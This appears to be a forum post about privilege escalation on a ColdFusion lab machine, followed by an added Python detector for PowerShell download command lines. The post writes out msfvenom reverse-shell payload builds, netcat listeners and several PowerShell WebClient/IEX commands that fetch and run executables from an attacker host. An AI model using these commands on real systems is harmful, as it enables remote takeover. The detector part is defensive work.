Having privesc issues with this box.
Tried following an IppSec video and the official write-up.
Please, I would like a non-meterpreter solution.
Basically, so far I’m able to get the user shell pretty easily with:
searchsploit coldfusion
Adobe ColdFusion Server 8.0.1 - ‘administrator/logviewer/searchlog.cfm?startRow’ Cross-Site Scripting | exploits/cfm/webapps/33168.txt
// I browse to the payload and activate it.
nc -lvnp 4444
// I now have user shell tolis and get user.txt
// Next I build my payload
msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.14.3 LPORT=5432 -f exe > exploit2.exe
nc -lvnp 5432
// I set up my web server in the directory where I am working on this box.
python -m SimpleHTTPServer
Serving HTTP on 0.0.0.0 port 8000 …
// It is listening on port 8000.
// I name my msfvenom payload as exploit2.exe and make sure that it is in my web server.
// I run the next command in my Windows user shell and it doesn’t work. No status updates in my web server terminal.
powershell “(new-object System.Net.WebClient).Downloadfile(‘http://10.10.14.3:8000/exploit2.exe’,‘exploit2.exe’)"
powershell (new-object System.Net.WebClient).Downloadfile(‘http://10.10.14.3:8000/exploit2.exe’,‘exploit2.exe’)
// try IEX
powershell “IEX(new-object System.Net.WebClient).Downloadfile(‘http://10.10.14.3:8000/exploit2.exe’,‘exploit2.exe’)”
powershell IEX(new-object System.Net.WebClient).Downloadfile(‘http://10.10.14.3:8000/exploit2.exe’,‘exploit2.exe’)
// Try these
powershell “IEX(New-Object Net.WebClient).downloadString(‘http://10.10.14.3:8000/exploit2.exe’)”
powershell IEX(New-Object Net.WebClient).downloadString(‘http://10.10.14.3:8000/exploit2.exe’)
// This last one is the only one that got a response in my mini web server, despite IppSec and the official writeup’s instructions. For some reason the double quotes are giving the shell bad characters (diamond with a question mark) and it seems to not like the command.
// Now my issue is that the payload does not seem to execute. My nc 5432 listener returns nothing.
// Trying a different payload.
msfvenom -p windows/shell_reverse_tcp LHOST=10.10.14.3 LPORT=5432 -f exe > exploit3.exe
// Tried these
powershell IEX(New-Object Net.WebClient).downloadString(‘http://10.10.14.3:8000/exploit3.exe’)
// Still nothing. Any thoughts?
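
From the defender's side, the command lines in this post form a recognisable PowerShell download pattern in process-creation logs. The following is an added example, not part of the original post: it tags such command lines, normalising curly quotes first. The sample lines are constructed from the commands quoted above, and the tag names are this example's own.

```python
import re

# Map typographic quotes (as they appear in the pasted commands) to ASCII so
# one pattern covers both the curly-quoted and plain-quoted forms.
QUOTES = str.maketrans({"\u2018": "'", "\u2019": "'", "\u201c": '"', "\u201d": '"'})
WEBCLIENT = re.compile(r"new-object\s+(?:system\.)?net\.webclient", re.I)
METHOD = re.compile(r"\.\s*(downloadfile|downloadstring)\s*\(", re.I)
IEX = re.compile(r"\b(?:iex|invoke-expression)\b", re.I)
URL = re.compile(r"https?://[^\s'\",)]+", re.I)

# Constructed process-creation command lines, modelled on the post's commands.
SAMPLE_LINES = [
    "powershell \u201c(new-object System.Net.WebClient).Downloadfile("
    "\u2018http://10.10.14.3:8000/exploit2.exe\u2019,\u2018exploit2.exe\u2019)\u201d",
    "powershell IEX(New-Object Net.WebClient).downloadString("
    "'http://10.10.14.3:8000/exploit3.exe')",
    "powershell -NoProfile Get-ChildItem",  # benign control line
]


def classify(cmdline):
    """Return sorted tags for one command line; an empty list means no match."""
    norm = cmdline.translate(QUOTES)
    if "powershell" not in norm.lower() or not WEBCLIENT.search(norm):
        return []
    tags = {"webclient"}
    method = METHOD.search(norm)
    if method:
        tags.add(method.group(1).lower())  # downloadfile / downloadstring
    if IEX.search(norm):
        tags.add("iex")
    url = URL.search(norm)
    if url:
        if re.search(r"\.(?:exe|dll|ps1|bat)$", url.group(0), re.I):
            tags.add("script-or-binary-url")
        if re.match(r"https?://\d{1,3}(?:\.\d{1,3}){3}(?::\d+)?/", url.group(0)):
            tags.add("raw-ip-host")
    return sorted(tags)


def scan(lines):
    """Return (line_index, tags) for every line that matched."""
    hits = [(i, classify(line)) for i, line in enumerate(lines)]
    return [(i, tags) for i, tags in hits if tags]


if __name__ == "__main__":
    for index, tags in scan(SAMPLE_LINES):
        print(index, ", ".join(tags))
```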